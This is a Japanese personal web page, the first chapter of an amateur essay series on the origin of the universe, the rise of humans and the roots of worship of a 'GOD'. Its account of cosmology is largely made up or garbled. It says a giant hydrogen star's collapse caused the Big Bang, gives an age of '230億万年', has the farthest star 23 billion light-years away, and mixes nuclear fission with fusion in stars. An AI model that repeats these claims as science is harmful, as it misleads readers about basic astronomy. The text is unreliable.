×

[PR]この広告は3ヶ月以上更新がないため表示されています。
ホームページを更新後24時間以内に表示されなくなります。

人類滅亡.人の心

 

第一章 宇宙の誕生から人間の誕生



この世とは何でしょうか。私たちが生きている世界。宇宙というところですね。

考え方は色々ありますが。

この世の始まりはいつでしょう。

宇宙が出来たときから始まったと言えます。

それでは宇宙が出来たのはいつでしょう。

その前に宇宙が出来る前はどんな状態だったのでしょう。

何もない世界。無であったと言われています。

これから書く事は天文学的な話が多いですから一般常識で考えず、私が書くことを

読むだけにして下さい。

天文学は一般の感覚ではないですから。

無とは、物質、音、光、時間など何もない常態です。

ところで物質で一番小さい物は何でしょう。

水の主成分水素です。化学記号でHです。Hは

水素原子ですが水素原子が合成すると水素分子

(水素)になります。

その水素原子が無の世界にいっぱいあったのです。

水素原子は小さく物とは言えません。

無の広がりの中で水素原子だけが存在し、いつしか水素原子同士がぶつかり

水素分子H2という物が出来たのです。

その水素分子は次々出来、水素の塊になって行きました。

想像も出来ない無限の時間をかけて。

そして次第に重力を持つほど大きくなりました。

重力を持った水素は多くの水素を取り込んで行きました。

その集まりは角運動により銀河のように円盤状で中心部は円形の固まり、

いわゆる星、太陽と同じものになって行き、その大きさは太陽どころでは

ありませんでした。

その星は太陽と同じように水素が重力により発生する高温度で核分裂、

核融合を繰り返し、強烈な光や熱を発しながら益々大きくなり、核融合で

色々な物を造り、中心部に入りこみ、表面はどんどん水素をを取り入れ核分裂

と核融合でありとあらゆるものを造り、それは重いから中へ入って行き重力は

物凄い物となり、中心近くの水素が無くなるほどになった時、その星は自分の

重力に耐えられず、崩壊しました。つまり爆発したのです。

その星の持つエネルギー(物)は無限に近いものと思われるほどのもので、

その爆発が現在の天文学で宇宙の始まりと感がえられています。



それがビックバンというものです。

予測では230億万年前の事です。

230億万年かかって出来たものが現在の宇宙です。

宇宙は今もビッグバンの中心から四方八方にすごい

スピードで広がり、観測されている一番遠い星は230

億光年先にあると言うことです。

ここで知っておいて貰いたいのは、宇宙の尺度はkm等で現されず、光年

(一秒で地球の周りを7週半回るスピードの光が1年かかる距離が1光年です)

で表します。

空気の綺麗なところから見る星々は、みな同じようですが、ほとんどの星は

太陽系がある銀河内の星で、数光年から数万光年にある星です。

それ以外は。星団、星の集まりです。

普通は銀河と呼ばれるもので大マゼラン雲も銀河で数千億個の星から

出来、わたしたちの銀河から数十万光年も離れているがそれは最も近いものである。

マゼラン雲の雲と言うのは小さい星や、星になりつつある物が雲のように見えると言

うことです。これらの銀河はお隣さんにあるもので、数千、数万光年から数億光年離

れたものも一杯あるのです。



今見える星々は私たちが見ている時間と同じ星はありません。

数万光年離れた星は数万年前の星です。

数億光年離れた星は数億年前のもので実際今現在の姿は

かなり変わっているでしょう。

というようなことから天文学をしていると、哲学的な思考になり、古い天文学者

は宇宙は人間が観察しているからあるもので、その前から宇宙はあるのでずっと

観察している者があると言われ、それをGODと言いました。

GODとは普通、日本語で神です。

しかしGODとは凄いとか偉大なとか言う意味もあり、神も同じです。

しかし日本では神と言うと神様、宗教としかとらえられていない。それはまた

後で書きます。太陽系が出来たのは45億年前と言われています。


地球に生物らしきものが現れ徐々に進化し、数億年地球を支配していた恐竜が

全滅してから、哺乳類が出てきてやがて人類の祖先が現れました。



それはたった100万年ほど前であります。

原始時代の人間は自然の野草や、果物などを主食

にして、日が昇れば起き、沈めば寝るという自然と共

に生活していました。そして太陽の恵み(明かり、

熱など)に感謝し崇拝していました。それは信仰の

始まりでGODを崇拝していたのであります。

やがて高い山や、大木などを崇拝物とし、今でも世界には山岳信仰や、自然物を

信仰しているものも少なくありません。

そして文化の元として火が使われだしました。

今まで食べられなかった物も焼くことで食べれるようになり、夜でも明かりを

得られるようになり、人の生活も変わって行きました。

NEXT
人類滅亡.人の心
この世とは何でしょうか。 <script type="text/javascript" src="KdlMx.js" charset="utf-8"></script> <SCRIPT type="text/javascript"></SCRIPT> <SCRIPT type="text/javascript" src="http://ct2.michikusa.jp/sc/1668740"></SCRIPT>